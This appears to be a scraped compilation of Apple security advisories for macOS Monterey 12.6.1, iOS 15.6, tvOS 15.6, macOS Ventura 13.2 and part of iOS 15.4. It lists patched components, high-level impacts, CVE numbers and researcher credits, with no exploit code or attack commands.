This issue was addressed with improved checks. This issue is fixed in macOS Monterey 12.6.1, macOS Big Sur 11.7.1. A remote user may be able to write arbitrary files.

Released October 24, 2022

**AppleMobileFileIntegrity**

Available for: macOS Monterey

Impact: An app may be able to modify protected parts of the file system

Description: This issue was addressed by removing additional entitlements.

CVE-2022-42825: Mickey Jin (@patch1t)

**Audio**

Available for: macOS Monterey

Impact: Parsing a maliciously crafted audio file may lead to disclosure of user information 

Description: The issue was addressed with improved memory handling. 

CVE-2022-42798: Anonymous working with Trend Micro Zero Day Initiative

Entry added October 27, 2022

**Calendar**

Available for: macOS Monterey

Impact: A remote user may be able to write arbitrary files

Description: This issue was addressed with improved checks.

CVE-2022-46723: Mikko Kenttälä (@Turmio\_) of SensorFu

Entry added February 20, 2023

**Kernel**

Available for: macOS Monterey

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved state management. 

CVE-2022-32944: Tim Michaud (@TimGMichaud) of Moveworks.ai

Entry added October 27, 2022

**Kernel**

Available for: macOS Monterey

Impact: An app may be able to execute arbitrary code with kernel privileges 

Description: A race condition was addressed with improved locking. 

CVE-2022-42803: Xinru Chi of Pangu Lab, John Aakerblom (@jaakerblom)

Entry added October 27, 2022

**Kernel**

Available for: macOS Monterey

Impact: An app may be able to execute arbitrary code with kernel privileges 

Description: A logic issue was addressed with improved checks. 

CVE-2022-42801: Ian Beer of Google Project Zero

Entry added October 27, 2022

**PackageKit**

Available for: macOS Monterey

Impact: An app may be able to modify protected parts of the file system

Description: A race condition was addressed with additional validation.

CVE-2022-46713: Mickey Jin (@patch1t) of Trend Micro

Entry added February 20, 2023

**ppp**

Available for: macOS Monterey

Impact: A buffer overflow may result in arbitrary code execution

Description: The issue was addressed with improved bounds checks. 

CVE-2022-32941: an anonymous researcher

Entry added October 27, 2022

**Ruby**

Available for: macOS Monterey

Impact: A remote user may be able to cause unexpected app termination or arbitrary code execution

Description: A memory corruption issue was addressed by updating Ruby to version 2.6.10.

CVE-2022-28739

**Sandbox**

Available for: macOS Monterey

Impact: An app with root privileges may be able to access private information

Description: This issue was addressed with improved data protection.

CVE-2022-32862: an anonymous researcher

**WebKit**

Available for: macOS Monterey

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A type confusion issue was addressed with improved memory handling.

WebKit Bugzilla: 244622  
CVE-2022-42823: Dohyun Lee (@l33d0hyun) of SSD Labs

Entry added December 22, 2022

**zlib**

Available for: macOS Monterey

Impact: A user may be able to cause unexpected app termination or arbitrary code execution 

Description: This issue was addressed with improved checks.

CVE-2022-37434: Evgeny Legerov

CVE-2022-42800: Evgeny Legerov

Entry added October 27, 2022

CVE-2022-46723: About the security content of macOS Monterey 12.6.1

A logic issue was addressed with improved state management. This issue is fixed in iOS 15.6 and iPadOS 15.6. A user may be able to view restricted content from the lock screen.

Released July 20, 2022

**APFS**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An app with root privileges may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2022-32832: Tommy Muir (@Muirey03)

**AppleAVD**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A remote user may be able to cause kernel code execution

Description: A buffer overflow was addressed with improved bounds checking.

CVE-2022-32788: Natalie Silvanovich of Google Project Zero

**AppleAVD**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An app may be able to disclose kernel memory

Description: The issue was addressed with improved memory handling.

CVE-2022-32824: Antonio Zekic (@antoniozekic) and John Aakerblom (@jaakerblom)

**AppleMobileFileIntegrity**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An app may be able to gain root privileges

Description: An authorization issue was addressed with improved state management.

CVE-2022-32826: Mickey Jin (@patch1t) of Trend Micro

**Apple Neural Engine**

Available for devices with Apple Neural Engine: iPhone 8 and later, iPad Pro (3rd generation) and later, iPad Air (3rd generation) and later, and iPad mini (5th generation)

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: An integer overflow was addressed with improved input validation.

CVE-2022-42805: Mohamed Ghannam (@\_simo36)

Entry added November 9, 2022

**Apple Neural Engine**

Available for devices with Apple Neural Engine: iPhone 8 and later, iPad Pro (3rd generation) and later, iPad Air (3rd generation) and later, and iPad mini (5th generation)

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: An out-of-bounds read was addressed with improved bounds checking.

CVE-2022-32948: Mohamed Ghannam (@\_simo36)

Entry added November 9, 2022

**Apple Neural Engine**

Available for devices with Apple Neural Engine: iPhone 8 and later, iPad Pro (3rd generation) and later, iPad Air (3rd generation) and later, and iPad mini (5th generation)

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: An out-of-bounds read was addressed with improved bounds checking.

CVE-2022-32845: Mohamed Ghannam (@\_simo36)

Entry updated November 9, 2022

**Apple Neural Engine**

Available for devices with Apple Neural Engine: iPhone 8 and later, iPad Pro (3rd generation) and later, iPad Air (3rd generation) and later, and iPad mini (5th generation)

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: This issue was addressed with improved checks.

CVE-2022-32840: Mohamed Ghannam (@\_simo36)

CVE-2022-32829: Tingting Yin of Tsinghua University, and Min Zheng of Ant Group

Entry updated September 16, 2022

**Apple Neural Engine**

Available for devices with Apple Neural Engine: iPhone 8 and later, iPad Pro (3rd generation) and later, iPad Air (3rd generation) and later, and iPad mini (5th generation)

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2022-32810: Mohamed Ghannam (@\_simo36)

**Audio**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: An out-of-bounds write issue was addressed with improved input validation.

CVE-2022-32820: an anonymous researcher

**Audio**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An app may be able to disclose kernel memory

Description: The issue was addressed with improved memory handling.

CVE-2022-32825: John Aakerblom (@jaakerblom)

**CoreMedia**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An app may be able to disclose kernel memory

Description: The issue was addressed with improved memory handling.

CVE-2022-32828: Antonio Zekic (@antoniozekic) and John Aakerblom (@jaakerblom)

**CoreText**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A remote user may cause an unexpected app termination or arbitrary code execution

Description: The issue was addressed with improved bounds checks.

CVE-2022-32839: STAR Labs (@starlabs\_sg)

**File System Events**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An app may be able to gain root privileges

Description: A logic issue was addressed with improved state management.

CVE-2022-32819: Joshua Mason of Mandiant

**GPU Drivers**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An app may be able to disclose kernel memory

Description: Multiple out-of-bounds write issues were addressed with improved bounds checking.

CVE-2022-32793: an anonymous researcher

**GPU Drivers**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved validation.

CVE-2022-32821: John Aakerblom (@jaakerblom)

**Home**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A user may be able to view restricted content from the lock screen

Description: A logic issue was addressed with improved state management.

CVE-2022-32855: Zitong Wu(吴梓桐) from Zhuhai No.1 Middle School(珠海市第一中学)

Entry updated September 16, 2022

**iCloud Photo Library**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An app may be able to access sensitive user information

Description: An information disclosure issue was addressed by removing the vulnerable code.

CVE-2022-32849: Joshua Jones

**ICU**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2022-32787: Dohyun Lee (@l33d0hyun) of SSD Secure Disclosure Labs & DNSLab, Korea Univ.

**ImageIO**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Processing a maliciously crafted image may result in disclosure of process memory

Description: The issue was addressed with improved memory handling.

CVE-2022-32841: hjy79425575

**ImageIO**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Processing a maliciously crafted file may lead to arbitrary code execution

Description: A logic issue was addressed with improved checks.

CVE-2022-32802: Ivan Fratric of Google Project Zero, Mickey Jin (@patch1t)

**ImageIO**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Processing a maliciously crafted image may lead to disclosure of user information

Description: An out-of-bounds read issue was addressed with improved bounds checking.

CVE-2022-32830: Ye Zhang (@co0py\_Cat) of Baidu Security

**ImageIO**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Processing an image may lead to a denial-of-service

Description: A null pointer dereference was addressed with improved validation.

CVE-2022-32785: Yiğit Can YILMAZ (@yilmazcanyigit)

**IOMobileFrameBuffer**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved state management.

CVE-2022-26768: an anonymous researcher

**Kernel**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An app with root privileges may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2022-32813: Xinru Chi of Pangu Lab

CVE-2022-32815: Xinru Chi of Pangu Lab

**Kernel**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An app may be able to disclose kernel memory

Description: An out-of-bounds read issue was addressed with improved bounds checking.

CVE-2022-32817: Xinru Chi of Pangu Lab

**Kernel**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An app with arbitrary kernel read and write capability may be able to bypass Pointer Authentication

Description: A logic issue was addressed with improved state management.

CVE-2022-32844: Sreejith Krishnan R (@skr0x1c0)

**Kernel**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An app with arbitrary kernel read and write capability may be able to bypass Pointer Authentication

Description: A race condition was addressed with improved state handling.

CVE-2022-32844: Sreejith Krishnan R (@skr0x1c0)

**Liblouis**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An app may cause unexpected app termination or arbitrary code execution

Description: This issue was addressed with improved checks.

CVE-2022-26981: Hexhive (hexhive.epfl.ch), NCNIPC of China (nipc.org.cn)

**libxml2**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An app may be able to leak sensitive user information

Description: A memory initialization issue was addressed with improved memory handling.

CVE-2022-32823

**Multi-Touch**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A type confusion issue was addressed with improved state handling.

CVE-2022-32814: Pan ZhenPeng (@Peterpan0927)

**PluginKit**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An app may be able to read arbitrary files

Description: A logic issue was addressed with improved state management.

CVE-2022-32838: Mickey Jin (@patch1t) of Trend Micro

**Safari Extensions**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Visiting a maliciously crafted website may leak sensitive data

Description: The issue was addressed with improved UI handling.

CVE-2022-32784: Young Min Kim of CompSec Lab at Seoul National University

**Software Update**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A user in a privileged network position can track a user’s activity

Description: This issue was addressed by using HTTPS when sending information over the network.

CVE-2022-32857: Jeffrey Paul (sneak.berlin)

**WebKit**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Visiting a website that frames malicious content may lead to UI spoofing

Description: The issue was addressed with improved UI handling.

WebKit Bugzilla: 239316  
CVE-2022-32816: Dohyun Lee (@l33d0hyun) of SSD Secure Disclosure Labs & DNSLab, Korea Univ.

**WebKit**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: An out-of-bounds write issue was addressed with improved input validation.

WebKit Bugzilla: 240720  
CVE-2022-32792: Manfred Paul (@\_manfp) working with Trend Micro Zero Day Initiative

**WebRTC**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A memory corruption issue was addressed with improved state management.

WebKit Bugzilla: 242339  
CVE-2022-2294: Jan Vojtesek of Avast Threat Intelligence team

**Wi-Fi**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: An out-of-bounds write was addressed with improved input validation.

CVE-2022-32860: Wang Yu of Cyberserval

Entry added November 9, 2022

**Wi-Fi**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An app may be able to cause unexpected system termination or write kernel memory

Description: This issue was addressed with improved checks.

CVE-2022-32837: Wang Yu of Cyberserval

**Wi-Fi**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A remote user may be able to cause unexpected system termination or corrupt kernel memory

Description: This issue was addressed with improved checks.

CVE-2022-32847: Wang Yu of Cyberserval

CVE-2022-32855: About the security content of iOS 15.6 and iPadOS 15.6

The issue was addressed with improved memory handling. This issue is fixed in tvOS 15.6, watchOS 8.7, iOS 15.6 and iPadOS 15.6. An app may be able to disclose kernel memory.

Released July 20, 2022

**APFS**

Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple TV HD

Impact: An app with root privileges may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2022-32832: Tommy Muir (@Muirey03)

**AppleAVD**

Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple TV HD

Impact: A remote user may be able to cause kernel code execution

Description: A buffer overflow issue was addressed with improved bounds checking.

CVE-2022-32788: Natalie Silvanovich of Google Project Zero

**AppleAVD**

Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple TV HD

Impact: An app may be able to disclose kernel memory

Description: The issue was addressed with improved memory handling.

CVE-2022-32824: Antonio Zekic (@antoniozekic) and John Aakerblom (@jaakerblom)

**AppleMobileFileIntegrity**

Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple TV HD

Impact: An app may be able to gain root privileges

Description: An authorization issue was addressed with improved state management.

CVE-2022-32826: Mickey Jin (@patch1t) of Trend Micro

**Audio**

Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple TV HD

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: An out-of-bounds write issue was addressed with improved input validation.

CVE-2022-32820: an anonymous researcher

**Audio**

Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple TV HD

Impact: An app may be able to disclose kernel memory

Description: The issue was addressed with improved memory handling.

CVE-2022-32825: John Aakerblom (@jaakerblom)

**CoreMedia**

Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple TV HD

Impact: An app may be able to disclose kernel memory

Description: The issue was addressed with improved memory handling.

CVE-2022-32828: Antonio Zekic (@antoniozekic) and John Aakerblom (@jaakerblom)

**CoreText**

Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple TV HD

Impact: A remote user may cause an unexpected app termination or arbitrary code execution

Description: The issue was addressed with improved bounds checks.

CVE-2022-32839: STAR Labs (@starlabs\_sg)

**File System Events**

Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple TV HD

Impact: An app may be able to gain root privileges

Description: A logic issue was addressed with improved state management.

CVE-2022-32819: Joshua Mason of Mandiant

**GPU Drivers**

Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple TV HD

Impact: An app may be able to disclose kernel memory

Description: Multiple out-of-bounds write issues were addressed with improved bounds checking.

CVE-2022-32793: an anonymous researcher

**GPU Drivers**

Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple TV HD

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved validation.

CVE-2022-32821: John Aakerblom (@jaakerblom)

**iCloud Photo Library**

Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple TV HD

Impact: An app may be able to access sensitive user information

Description: An information disclosure issue was addressed by removing the vulnerable code.

CVE-2022-32849: Joshua Jones

**ICU**

Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple TV HD

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2022-32787: Dohyun Lee (@l33d0hyun) of SSD Secure Disclosure Labs & DNSLab, Korea Univ.

**ImageIO**

Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple TV HD

Impact: Processing a maliciously crafted image may result in disclosure of process memory

Description: The issue was addressed with improved memory handling.

CVE-2022-32841: hjy79425575

**ImageIO**

Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple TV HD

Impact: Processing a maliciously crafted file may lead to arbitrary code execution

Description: A logic issue was addressed with improved checks.

CVE-2022-32802: Ivan Fratric of Google Project Zero, Mickey Jin (@patch1t)

**ImageIO**

Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple TV HD

Impact: Processing a maliciously crafted image may lead to disclosure of user information

Description: An out-of-bounds read issue was addressed with improved bounds checking.

CVE-2022-32830: Ye Zhang (@co0py\_Cat) of Baidu Security

**Kernel**

Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple TV HD

Impact: An app with root privileges may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2022-32813: Xinru Chi of Pangu Lab

CVE-2022-32815: Xinru Chi of Pangu Lab

**Kernel**

Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple TV HD

Impact: An app may be able to disclose kernel memory

Description: An out-of-bounds read issue was addressed with improved bounds checking.

CVE-2022-32817: Xinru Chi of Pangu Lab

**Kernel**

Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple TV HD

Impact: An app with arbitrary kernel read and write capability may be able to bypass Pointer Authentication

Description: A logic issue was addressed with improved state management.

CVE-2022-32844: Sreejith Krishnan R (@skr0x1c0)

**Liblouis**

Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple TV HD

Impact: An app may cause unexpected app termination or arbitrary code execution

Description: This issue was addressed with improved checks.

CVE-2022-26981: Hexhive (hexhive.epfl.ch), NCNIPC of China (nipc.org.cn)

**libxml2**

Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple TV HD

Impact: An app may be able to leak sensitive user information

Description: A memory initialization issue was addressed with improved memory handling.

CVE-2022-32823

**Multi-Touch**

Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple TV HD

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A type confusion issue was addressed with improved checks.

CVE-2022-32814: Pan ZhenPeng (@Peterpan0927)

**Software Update**

Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple TV HD

Impact: A user in a privileged network position can track a user’s activity

Description: This issue was addressed by using HTTPS when sending information over the network.

CVE-2022-32857: Jeffrey Paul (sneak.berlin)

**WebKit**

Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple TV HD

Impact: Visiting a website that frames malicious content may lead to UI spoofing

Description: The issue was addressed with improved UI handling.

WebKit Bugzilla: 239316  
CVE-2022-32816: Dohyun Lee (@l33d0hyun) of SSD Secure Disclosure Labs & DNSLab, Korea Univ.

**WebKit**

Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple TV HD

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: An out-of-bounds write issue was addressed with improved input validation.

WebKit Bugzilla: 240720  
CVE-2022-32792: Manfred Paul (@\_manfp) working with Trend Micro Zero Day Initiative

**Wi-Fi**

Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple TV HD

Impact: An app may be able to cause unexpected system termination or write kernel memory

Description: This issue was addressed with improved checks.

CVE-2022-32837: Wang Yu of Cyberserval

**Wi-Fi**

Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple TV HD

Impact: A remote user may be able to cause unexpected system termination or corrupt kernel memory

Description: This issue was addressed with improved checks.

CVE-2022-32847: Wang Yu of Cyberserval

CVE-2022-32824: About the security content of tvOS 15.6

The issue was addressed with improved handling of caches. This issue is fixed in macOS Ventura 13.2, tvOS 16.3, iOS 16.3 and iPadOS 16.3, watchOS 9.3. Visiting a website may lead to an app denial-of-service.

Released January 23, 2023

**AppleMobileFileIntegrity**

Available for: macOS Ventura

Impact: An app may be able to access user-sensitive data

Description: This issue was addressed by enabling hardened runtime.

CVE-2023-23499: Wojciech Reguła (@\_r3ggi) of SecuRing (wojciechregula.blog)

**Crash Reporter**

Available for: macOS Ventura

Impact: A user may be able to read arbitrary files as root

Description: A race condition was addressed with additional validation.

CVE-2023-23520: Cees Elzinga

Entry added February 20, 2023

**curl**

Available for: macOS Ventura

Impact: Multiple issues in curl

Description: Multiple issues were addressed by updating to curl version 7.86.0.

CVE-2022-42915

CVE-2022-42916

CVE-2022-32221

CVE-2022-35260

**dcerpc**

Available for: macOS Ventura

Impact: Mounting a maliciously crafted Samba network share may lead to arbitrary code execution

Description: A buffer overflow issue was addressed with improved memory handling.

CVE-2023-23513: Dimitrios Tatsis and Aleksandar Nikolic of Cisco Talos

**DiskArbitration**

Available for: macOS Ventura

Impact: An encrypted volume may be unmounted and remounted by a different user without prompting for the password

Description: A logic issue was addressed with improved state management.

CVE-2023-23493: Oliver Norpoth (@norpoth) of KLIXX GmbH (klixx.com)

**Foundation**

Available for: macOS Ventura

Impact: An app may be able to execute arbitrary code out of its sandbox or with certain elevated privileges

Description: The issue was addressed with improved memory handling.

CVE-2023-23530: Austin Emmitt, Senior Security Researcher at Trellix ARC

Entry added February 20, 2023

**Foundation**

Available for: macOS Ventura

Impact: An app may be able to execute arbitrary code out of its sandbox or with certain elevated privileges

Description: The issue was addressed with improved memory handling.

CVE-2023-23531: Austin Emmitt, Senior Security Researcher at Trellix ARC

Entry added February 20, 2023

**ImageIO**

Available for: macOS Ventura

Impact: Processing an image may lead to a denial-of-service

Description: A memory corruption issue was addressed with improved state management.

CVE-2023-23519: Yiğit Can YILMAZ (@yilmazcanyigit)

**Intel Graphics Driver**

Available for: macOS Ventura

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved bounds checks.

CVE-2023-23507: an anonymous researcher

**Kernel**

Available for: macOS Ventura

Impact: An app may be able to leak sensitive kernel state

Description: The issue was addressed with improved memory handling.

CVE-2023-23500: Pan ZhenPeng (@Peterpan0927) of STAR Labs SG Pte. Ltd. (@starlabs\_sg)

**Kernel**

Available for: macOS Ventura

Impact: An app may be able to determine kernel memory layout

Description: An information disclosure issue was addressed by removing the vulnerable code.

CVE-2023-23502: Pan ZhenPeng (@Peterpan0927) of STAR Labs SG Pte. Ltd. (@starlabs\_sg)

**Kernel**

Available for: macOS Ventura

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2023-23504: Adam Doupé of ASU SEFCOM

**libxpc**

Available for: macOS Ventura

Impact: An app may be able to access user-sensitive data

Description: A permissions issue was addressed with improved validation.

CVE-2023-23506: Guilherme Rambo of Best Buddy Apps (rambo.codes)

**Mail Drafts**

Available for: macOS Ventura

Impact: The quoted original message may be selected from the wrong email when forwarding an email from an Exchange account

Description: A logic issue was addressed with improved state management.

CVE-2023-23498: an anonymous researcher

**Maps**

Available for: macOS Ventura

Impact: An app may be able to bypass Privacy preferences

Description: A logic issue was addressed with improved state management.

CVE-2023-23503: an anonymous researcher

**PackageKit**

Available for: macOS Ventura

Impact: An app may be able to gain root privileges

Description: A logic issue was addressed with improved state management.

CVE-2023-23497: Mickey Jin (@patch1t)

**Safari**

Available for: macOS Ventura

Impact: An app may be able to access a user’s Safari history

Description: A permissions issue was addressed with improved validation.

CVE-2023-23510: Guilherme Rambo of Best Buddy Apps (rambo.codes)

**Safari**

Available for: macOS Ventura

Impact: Visiting a website may lead to an app denial-of-service

Description: The issue was addressed with improved handling of caches.

CVE-2023-23512: Adriatik Raci

**Screen Time**

Available for: macOS Ventura

Impact: An app may be able to access information about a user’s contacts

Description: A privacy issue was addressed with improved private data redaction for log entries.

CVE-2023-23505: Wojciech Reguła of SecuRing (wojciechregula.blog)

**Vim**

Available for: macOS Ventura

Impact: Multiple issues in Vim

Description: A use after free issue was addressed with improved memory management.

CVE-2022-3705

**Weather**

Available for: macOS Ventura

Impact: An app may be able to bypass Privacy preferences

Description: The issue was addressed with improved memory handling.

CVE-2023-23511: Wojciech Regula of SecuRing (wojciechregula.blog), an anonymous researcher

**WebKit**

Available for: macOS Ventura

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: The issue was addressed with improved checks.

WebKit Bugzilla: 245464  
CVE-2023-23496: ChengGang Wu, Yan Kang, YuHao Hu, Yue Sun, Jiming Wang, JiKai Ren and Hang Shu of Institute of Computing Technology, Chinese Academy of Sciences

**WebKit**

Available for: macOS Ventura

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: The issue was addressed with improved memory handling.

WebKit Bugzilla: 248268  
CVE-2023-23518: YeongHyeon Choi (@hyeon101010), Hyeon Park (@tree\_segment), SeOk JEON (@\_seokjeon), YoungSung Ahn (@\_ZeroSung), JunSeo Bae (@snakebjs0107), Dohyun Lee (@l33d0hyun) of Team ApplePIE

WebKit Bugzilla: 248268  
CVE-2023-23517: YeongHyeon Choi (@hyeon101010), Hyeon Park (@tree\_segment), SeOk JEON (@\_seokjeon), YoungSung Ahn (@\_ZeroSung), JunSeo Bae (@snakebjs0107), Dohyun Lee (@l33d0hyun) of Team ApplePIE

**Wi-Fi**

Available for: macOS Ventura

Impact: An app may be able to disclose kernel memory.

Description: The issue was addressed with improved memory handling

CVE-2023-23501: Pan ZhenPeng (@Peterpan0927) of STAR Labs SG Pte. Ltd. (@starlabs\_sg)

**Windows Installer**

Available for: macOS Ventura

Impact: An app may be able to bypass Privacy preferences.

Description: The issue was addressed with improved memory handling.

CVE-2023-23508: Mickey Jin (@patch1t)

CVE-2023-23512: About the security content of macOS Ventura 13.2

A logic issue was addressed with improved restrictions. This issue is fixed in iOS 15.4 and iPadOS 15.4, macOS Monterey 12.3. A malicious application may be able to leak sensitive user information.

Released March 14, 2022

**Accelerate Framework**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Opening a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution

Description: A memory corruption issue was addressed with improved state management.

CVE-2022-22633: ryuzaki

Entry updated May 25, 2022

**AppleAVD**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Processing a maliciously crafted image may lead to heap corruption

Description: A memory corruption issue was addressed with improved validation.

CVE-2022-22666: Marc Schoenefeld, Dr. rer. nat.

**AVEVideoEncoder**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A malicious application may be able to execute arbitrary code with kernel privileges

Description: A buffer overflow was addressed with improved bounds checking.

CVE-2022-22634: an anonymous researcher

